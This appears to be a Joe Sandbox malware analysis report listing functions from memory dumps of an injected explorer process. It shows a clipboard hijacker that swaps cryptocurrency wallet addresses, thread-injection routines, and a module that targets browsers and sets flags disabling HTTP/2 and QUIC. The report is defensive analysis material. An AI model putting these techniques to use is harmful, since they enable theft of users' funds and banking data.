                                                                                                                                                                                                                                                    • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0E908246
                                                                                                                                                                                                                                                    • 0x2dd646c22bd525dc6ae0cea64737686d84742f54, xrefs: 0E907EDA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                                    • String ID: 0x2dd646c22bd525dc6ae0cea64737686d84742f54$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE$TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                                    • API String ID: 2992153386-3662614053
                                                                                                                                                                                                                                                    • Opcode ID: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction ID: 8735f12490330f6d09b8fd2e8dd35fe93cd59185cd0ba7934c039c62d08b350c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90D12161711A86E9DF14EFB5D4542DC23A6E7947CCFC048229B0DABAADEF74CA09C350
                                                                                                                                                                                                                                                    Function 0E9046D0 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1033 e9046d0-e90474a call e92f720 call e8f8890 1039 e9047c7-e9047db call e92f6b0 call e92f7e8 SleepEx 1033->1039 1040 e90474c-e90475e call e92f770 1033->1040 1046 e904770-e904797 call e92f878 StrStrA 1040->1046 1047 e904760-e904765 call e904b50 1040->1047 1053 e9047a0-e9047a3 1046->1053 1054 e904799-e90479c 1046->1054 1047->1039 1055 e9047c2-e9047c5 1053->1055 1056 e9047a5-e9047bd strtol call e904a40 1053->1056 1054->1053 1055->1039 1055->1046 1056->1055
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0E90472F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: EnterCriticalSection.KERNEL32 ref: 0E8F88D8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: RtlInitializeCriticalSection.NTDLL ref: 0E8F88E5
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcpyA.KERNEL32 ref: 0E8F891A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcpyA.KERNEL32 ref: 0E8F893D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcatA.KERNEL32 ref: 0E8F894D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcatA.KERNEL32 ref: 0E8F895D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: LeaveCriticalSection.KERNEL32 ref: 0E8F89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: memcpy.MSVCRT ref: 0E8F89FC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrlenA.KERNEL32 ref: 0E8F8A0A
                                                                                                                                                                                                                                                    • lstrcmp.KERNEL32 ref: 0E904756
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0E9047CA
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0E9047D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292776791-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction ID: fdf2b013f215660f19779d5befbbde7ac73f4e1d5f94389e15cf9173868ea83b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD216D21215B8195EF15DF21F85035EB7E9FB89B80F844928DB9957758EF3CC5048B00
                                                                                                                                                                                                                                                    Function 0E8FE450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                                    • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                                    • Opcode ID: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction ID: 22421baa24f01dc908bce1f301e6b895d7eb76381196f31021f714081f43f841
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F43118322187C4DADB10DF69E49075ABBA1FB99354FA4041AEB8983A68DB7CC559CF00
                                                                                                                                                                                                                                                    Function 0E8F8420 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 993137029-0
                                                                                                                                                                                                                                                    • Opcode ID: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction ID: 2c2628ada96a73033cd72d2b9398fa6d1d53f8357bb655d50087dae56cb0987e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5018C36711A85C6EB08CF22E99031D7361FB88FC4F088469DB4A13B64DF38C466CB00
                                                                                                                                                                                                                                                    Function 10D79EA0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2372642624-0
                                                                                                                                                                                                                                                    • Opcode ID: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction ID: 4fa6b1208430d4a2711a463fc486e19f48db9aafcd58e5b019d7c710046e7c7a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E0267160270183EF2807F174043AA1260DB4DF85F6898AACA8A45341EE2C84C74300
                                                                                                                                                                                                                                                    Function 0F4B9EA0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2372642624-0
                                                                                                                                                                                                                                                    • Opcode ID: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction ID: 5582ced8afbc8b65c58a8e292820d073e82c5732c10f1d7f1de2ea735219a6eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E0866161370282EF79177264453BB1271AB5CF62F852838CD1A49792EE2D85DE5360
                                                                                                                                                                                                                                                    Function 0E909EA0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2372642624-0
                                                                                                                                                                                                                                                    • Opcode ID: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction ID: 14c02248c372a04ee172a2af8a67b80052d8068a4bafd6d336bf905f6a98c189
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72fd4a694c28bc038e3872f39665e68e0757215d080453b0d229dca2e267573
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E086E171274686EF195771A44536A12609F9CB41F841CACC81E65391EE2C89DB4700
                                                                                                                                                                                                                                                    Function 0E8F7B90 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 882653843-0
                                                                                                                                                                                                                                                    • Opcode ID: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction ID: 1c70d1a7bf89a8ef0f263d2882b9357e32290afa9fa2a74bc80460aab7d7c4a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E731EE63228BC5C6E7248F36E9003697B70F709F88F488256EF888778ACB2DC851C754
                                                                                                                                                                                                                                                    Function 0E8F7EE0 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CF0: GetCurrentProcessId.KERNEL32 ref: 0E8F7D4B
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CF0: GetCurrentThreadId.KERNEL32 ref: 0E8F7D57
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CF0: HeapAlloc.KERNEL32 ref: 0E8F7D81
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CF0: Thread32Next.KERNEL32 ref: 0E8F7DE0
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CF0: CloseHandle.KERNEL32 ref: 0E8F7DF0
                                                                                                                                                                                                                                                    • OpenThread.KERNEL32 ref: 0E8F7F2E
                                                                                                                                                                                                                                                    • SuspendThread.KERNEL32 ref: 0E8F7F3F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F82E0: GetThreadContext.KERNEL32 ref: 0E8F8314
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F82E0: SetThreadContext.KERNEL32 ref: 0E8F83D4
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0E8F7F56
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4205413918-0
                                                                                                                                                                                                                                                    • Opcode ID: 858aeba3fb247d2a0e16c71170cbf3ca9940fc4517a81e42483914c8171c01e0
                                                                                                                                                                                                                                                    • Instruction ID: 63432a7c190347ae68b0cba938ba84922bea0c3902e9ec0c5a15d571ee2fbb74
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 858aeba3fb247d2a0e16c71170cbf3ca9940fc4517a81e42483914c8171c01e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C015B32225B85C7EB14DF16E49061DB7A0F789F84F48902AEF9A53B58CF39D462CB04
                                                                                                                                                                                                                                                    Function 0E8F81F0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F7CA0: Sleep.KERNEL32 ref: 0E8F7CCC
                                                                                                                                                                                                                                                    • HeapCreate.KERNEL32 ref: 0E8F820D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateHeapSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 221814145-0
                                                                                                                                                                                                                                                    • Opcode ID: 5fdc3f4705d2811037ed53dc1388606f1674e1e98d5c20473a48f5bf96f816bc
                                                                                                                                                                                                                                                    • Instruction ID: b7ba87077e76752b60ac2ccc07380a90c13e07731288bfa25a17abe8f8247b18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fdc3f4705d2811037ed53dc1388606f1674e1e98d5c20473a48f5bf96f816bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E09210B62700C7FB28BBB9A8D1B5910C0CF48320F981C39DF18C6781DE6E5DE946E2

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 10D61A40 Relevance: 84.3, APIs: 35, Strings: 13, Instructions: 267stringfilethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                                    • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                                                                    • API String ID: 3240663557-1393645298
                                                                                                                                                                                                                                                    • Opcode ID: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction ID: 07713c56e0b56319765ce1306bf66e156c48987e3d8bcf85e1c3bdba0a258e99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BC16C76604B458AEB10CFA6F85439A73B1F789B88F448116DE8E47B28DF78D589CB00
                                                                                                                                                                                                                                                    Function 0F4A1A40 Relevance: 84.3, APIs: 35, Strings: 13, Instructions: 267stringfilethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                                    • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                                                                    • API String ID: 3240663557-1393645298
                                                                                                                                                                                                                                                    • Opcode ID: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction ID: abca43d40ff71c78348177732cb41ac6313f3898c43b59dbd671c4dd96f36348
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C15132605B4286EB64DF66F8543AA73A2F788B98F801126DE4D47F28DF3CD149DB50
                                                                                                                                                                                                                                                    Function 10D66700 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4277384649-0
                                                                                                                                                                                                                                                    • Opcode ID: 4881e12f3f3eb48c835b161b8eed24f06c7f41012e617efe30505bb3f1fe8cf4
                                                                                                                                                                                                                                                    • Instruction ID: 440e873fb0a00d46661a2e098be537aecd7294be32a2b16983162ce77baa7b6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4881e12f3f3eb48c835b161b8eed24f06c7f41012e617efe30505bb3f1fe8cf4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2F16D32304AC18BDB309F65F8947DA7BA1FB48B8DF455125CA8A47B64EFB9C588C700
                                                                                                                                                                                                                                                    Function 0F4A6700 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4277384649-0
                                                                                                                                                                                                                                                    • Opcode ID: 4881e12f3f3eb48c835b161b8eed24f06c7f41012e617efe30505bb3f1fe8cf4
                                                                                                                                                                                                                                                    • Instruction ID: 64b9327b6ecd22c12256d498569adfb309e36bacf04136d5fd93eb4b204bdf7f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4881e12f3f3eb48c835b161b8eed24f06c7f41012e617efe30505bb3f1fe8cf4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EF19F36300A8286EB309F25E8443EB77A1F758B98F49912ACE5B47F55EF79D149C700
                                                                                                                                                                                                                                                    Function 10D8D432 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D621B0: char_traits.LIBCPMT ref: 10D621EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D451
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RtlPcToFileHeader.NTDLL ref: 10D7C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C34C: RaiseException.KERNEL32 ref: 10D7C41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D471
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D4AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D4DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D4FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D52E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D56E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D591
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D5B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D5D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D5F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D611
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D631
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D651
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D67A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D69A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D6BA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D6DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D704
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D72E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D75A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D791
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D7A8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D7DE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D81E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D84A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D86A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D8D881
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaisechar_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1722249982-0
                                                                                                                                                                                                                                                    • Opcode ID: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
                                                                                                                                                                                                                                                    • Instruction ID: 59f4db978c8e2286201588c5760fcd4a98a84d80ce8a05e1a8f19229491a4b28
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
